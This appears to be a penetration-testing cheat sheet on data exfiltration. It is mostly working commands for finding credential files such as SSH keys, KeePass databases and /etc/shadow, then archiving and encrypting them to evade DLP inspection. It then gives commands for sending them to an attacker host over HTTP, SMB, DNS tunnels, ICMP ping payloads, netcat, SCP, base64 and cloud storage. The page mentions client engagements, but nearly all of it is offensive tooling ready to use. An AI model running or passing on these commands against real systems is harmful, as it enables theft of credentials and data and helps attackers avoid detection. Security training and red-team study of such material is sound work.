Data Exfiltration

Data exfiltration is the unauthorized transfer of data from a compromised system to an attacker-controlled destination. Different environments require different exfiltration methods depending on what protocols are allowed outbound.

# Set environment variables
export TARGET=<ip>
export LHOST=<your-ip>
export LPORT=4444

Staging and Preparation

Before exfiltrating, stage your data to reduce transfer volume and avoid detection.

Find Interesting Data

Linux:

find / -name "*.conf" -o -name "*.bak" -o -name "*.sql" -o -name "*.kdbx" -o -name "id_rsa" 2>/dev/null
find / -name "*.txt" -o -name "*.csv" -o -name "*.xlsx" 2>/dev/null | head -50
grep -rl "password" /var/www/ /opt/ /home/ 2>/dev/null

Windows:

Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xlsx,*.docx,*.kdbx,*.conf,*.bak -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\ -Recurse -Include *.txt,*.doc* | Select-String -Pattern "password" -List

Compress Before Transfer

Compression reduces file size and can evade content inspection.

Linux:

tar czf /tmp/loot.tar.gz /home/ /var/backup/ /etc/shadow

Windows:

Compress-Archive -Path C:\Users\Public\loot\ -DestinationPath C:\Users\Public\loot.zip

Encrypt Before Transfer

Encryption prevents content inspection by DLP (Data Loss Prevention) and network monitoring tools.

Linux:

openssl enc -aes-256-cbc -pbkdf2 -in loot.tar.gz -out loot.enc -k "exfilpassword"

Decrypt on Kali:

openssl enc -aes-256-cbc -pbkdf2 -d -in loot.enc -out loot.tar.gz -k "exfilpassword"

Windows (PowerShell):

Compress-Archive -Path C:\loot\ -DestinationPath C:\Users\Public\loot.zip
# Then transfer the zip — PowerShell doesn't have built-in symmetric encryption,
# use 7z with a password if available:
7z a -p"exfilpassword" -mhe=on C:\Users\Public\loot.7z C:\loot\

HTTP / HTTPS Exfiltration

The most reliable method in most environments since HTTP/HTTPS is almost always allowed outbound.

Python Upload Server (Kali)

pip install uploadserver --break-system-packages
python3 -m uploadserver 443 --server-certificate server.pem

From Linux Target

curl -X POST https://$LHOST:443/upload -F "files=@/tmp/loot.tar.gz" -k

From Windows Target

Invoke-RestMethod -Uri http://$LHOST/upload -Method POST -InFile C:\Users\Public\loot.zip

Or using .NET WebClient:

$wc = New-Object System.Net.WebClient
$wc.UploadFile("http://$LHOST/upload", "C:\Users\Public\loot.zip")

SMB Exfiltration

If outbound SMB (port 445) is allowed, use an impacket SMB server on Kali:

impacket-smbserver share /home/kali/loot -smb2support

From the Windows target, copy files directly to the share:

copy C:\Users\Public\loot.zip \\$LHOST\share\loot.zip

Or recursively copy a directory:

xcopy C:\Users\Public\loot\ \\$LHOST\share\ /E /Y

DNS Exfiltration

DNS is often allowed outbound even in highly restricted environments. Data is encoded into DNS queries sent to an attacker-controlled authoritative name server.

dnscat2

On Kali (start the DNS server):

dnscat2-server <your-domain>

On the target (connect back over DNS):

./dnscat --dns server=$LHOST

From within the dnscat2 session, you can download files:

download /etc/passwd /home/kali/loot/passwd

Manual DNS Exfiltration

Encode data into DNS queries (slow but stealthy):

# On target — encode file as hex and send via DNS lookups
xxd -p /etc/passwd | while read line; do nslookup $line.$LHOST; done

On Kali, capture the queries with tcpdump or your DNS server logs and reconstruct the data.

warning

DNS exfiltration is very slow due to the small payload size per query (~253 bytes per label, ~63 bytes per subdomain label). Use it when other channels are blocked, not as a primary method.

ICMP Exfiltration

ICMP echo requests (ping) can carry arbitrary data in the payload field. Useful when only ICMP is allowed outbound.

Manual ICMP Data Transfer

On Kali, listen for ICMP packets:

sudo tcpdump -i tun0 icmp -w icmp_capture.pcap

On the Linux target, embed data in ping payloads:

xxd -p -c 16 /etc/passwd | while read line; do ping -c 1 -p "$line" $LHOST; done

Extract data from the pcap on Kali:

tshark -r icmp_capture.pcap -T fields -e data.data | xxd -r -p

Netcat / Reverse Connection

Simple TCP transfer when a direct connection is possible.

Start a listener on Kali:

nc -nlvp 9999 > loot.tar.gz

From the Linux target:

nc -nv $LHOST 9999 < /tmp/loot.tar.gz

From a Windows target (if nc.exe is available):

nc.exe $LHOST 9999 < C:\Users\Public\loot.zip

SCP / SFTP (If SSH is Available)

From the target to Kali:

scp /tmp/loot.tar.gz kali@$LHOST:/home/kali/loot/

From Kali pulling from the target:

scp $USER@$TARGET:/tmp/loot.tar.gz /home/kali/loot/

Base64 Over Existing Channel

When no new outbound connections are possible but you have an interactive shell (bind shell, web shell, etc.), encode files and copy/paste through the existing session.

On the target:

base64 -w 0 /etc/shadow

Or on Windows:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\Public\loot.zip"))

Copy the output, then decode on Kali:

echo '<base64-output>' | base64 -d > loot

tip

For large files, split the base64 output into chunks and transfer them separately, then reassemble. This is tedious but works when nothing else does.

Cloud Storage Exfiltration

If the target has access to cloud services (OneDrive, Google Drive, Dropbox, AWS S3), you can upload data through legitimate channels that are unlikely to be blocked.

AWS CLI (If Credentials Are Available)

aws s3 cp /tmp/loot.tar.gz s3://your-bucket/loot.tar.gz

PowerShell to Cloud API

Upload to a pre-signed S3 URL:

Invoke-RestMethod -Uri "https://your-bucket.s3.amazonaws.com/upload?presigned-params" -Method PUT -InFile C:\loot.zip

warning

Using the target organization's own cloud credentials for exfiltration leaves an audit trail tied to their account. Use your own infrastructure when possible.

Exfiltration Checklist

Identify what data is valuable before collecting everything
Stage and compress data to minimize transfer volume
Encrypt sensitive data before exfiltration (prevents content inspection and protects your client's data in transit)
Test your exfiltration method before sending real data
Monitor for DLP alerts — if transfers start failing, the blue team may have flagged your activity
Clean up staged files after successful transfer
Document exactly what was exfiltrated (required for engagement reporting)

Staging and Preparation​

Find Interesting Data​

Compress Before Transfer​

Encrypt Before Transfer​

HTTP / HTTPS Exfiltration​

Python Upload Server (Kali)​

From Linux Target​

From Windows Target​

SMB Exfiltration​

DNS Exfiltration​

dnscat2​

Manual DNS Exfiltration​

ICMP Exfiltration​

Manual ICMP Data Transfer​

Netcat / Reverse Connection​

SCP / SFTP (If SSH is Available)​

Base64 Over Existing Channel​

Cloud Storage Exfiltration​

AWS CLI (If Credentials Are Available)​

PowerShell to Cloud API​

Exfiltration Checklist​

Staging and Preparation

Find Interesting Data

Compress Before Transfer

Encrypt Before Transfer

HTTP / HTTPS Exfiltration

Python Upload Server (Kali)

From Linux Target

From Windows Target

SMB Exfiltration

DNS Exfiltration

dnscat2

Manual DNS Exfiltration

ICMP Exfiltration

Manual ICMP Data Transfer

Netcat / Reverse Connection

SCP / SFTP (If SSH is Available)

Base64 Over Existing Channel

Cloud Storage Exfiltration

AWS CLI (If Credentials Are Available)

PowerShell to Cloud API

Exfiltration Checklist